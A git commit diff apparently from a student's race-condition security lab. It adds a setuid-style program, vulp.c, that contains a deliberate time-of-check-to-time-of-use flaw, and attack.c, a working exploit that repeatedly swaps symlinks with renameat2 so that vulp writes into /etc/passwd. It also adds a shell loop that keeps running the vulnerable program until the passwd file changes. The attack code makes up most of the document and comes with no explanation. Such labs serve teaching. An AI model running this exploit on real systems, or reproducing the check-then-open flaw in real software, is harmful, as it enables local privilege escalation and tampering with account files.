commit 7d87b9b4888209ea20a8397d944d5c78b4e1f540
Author: Trance-0 <wuzheyuan.86@gmail.com>
Date:   Thu Mar 26 12:36:41 2026 -0500

    first commit

diff --git a/Race_Condition.pdf b/Race_Condition.pdf
new file mode 100644
index 0000000..0cf4c25
Binary files /dev/null and b/Race_Condition.pdf differ
diff --git a/attack b/attack
new file mode 100755
index 0000000..4169141
Binary files /dev/null and b/attack differ
diff --git a/attack.c b/attack.c
new file mode 100644
index 0000000..c5ea6f7
--- /dev/null
+++ b/attack.c
@@ -0,0 +1,13 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <unistd.h>
+int main()
+{
+	unsigned int flags = RENAME_EXCHANGE;
+	unlink("/tmp/XYZ"); symlink("/dev/null", "/tmp/XYZ");
+	unlink("/tmp/ABC"); symlink("/etc/passwd", "/tmp/ABC");
+	while(1){
+	renameat2(0, "/tmp/XYZ", 0, "/tmp/ABC", flags);
+	}
+	return 0;
+}
\ No newline at end of file
diff --git a/target_process.sh b/target_process.sh
new file mode 100755
index 0000000..2aa2fdd
--- /dev/null
+++ b/target_process.sh
@@ -0,0 +1,13 @@
+#!/bin/bash
+
+CHECK_FILE="ls -l /etc/passwd"
+old=$($CHECK_FILE)
+new=$($CHECK_FILE)
+while [ "$old" == "$new" ]  
+do
+   echo "hello" | ./vulp 
+   new=$($CHECK_FILE)
+done
+echo "STOP... The passwd file has been changed"
+
+
diff --git a/vulp b/vulp
new file mode 100755
index 0000000..76ce445
Binary files /dev/null and b/vulp differ
diff --git a/vulp.c b/vulp.c
new file mode 100644
index 0000000..d047c77
--- /dev/null
+++ b/vulp.c
@@ -0,0 +1,29 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+int main()
+{
+    char* fn = "/tmp/XYZ";
+    char buffer[60];
+    FILE* fp;
+
+    /* get user input */
+    scanf("%50s", buffer);
+
+    if (!access(fn, W_OK)) {
+        fp = fopen(fn, "a+");
+        if (!fp) {
+            perror("Open failed");
+            exit(1);
+        }
+        fwrite("\n", sizeof(char), 1, fp);
+        fwrite(buffer, sizeof(char), strlen(buffer), fp);
+        fclose(fp);
+    } else {
+        printf("No permission \n");
+    }
+
+    return 0;
+}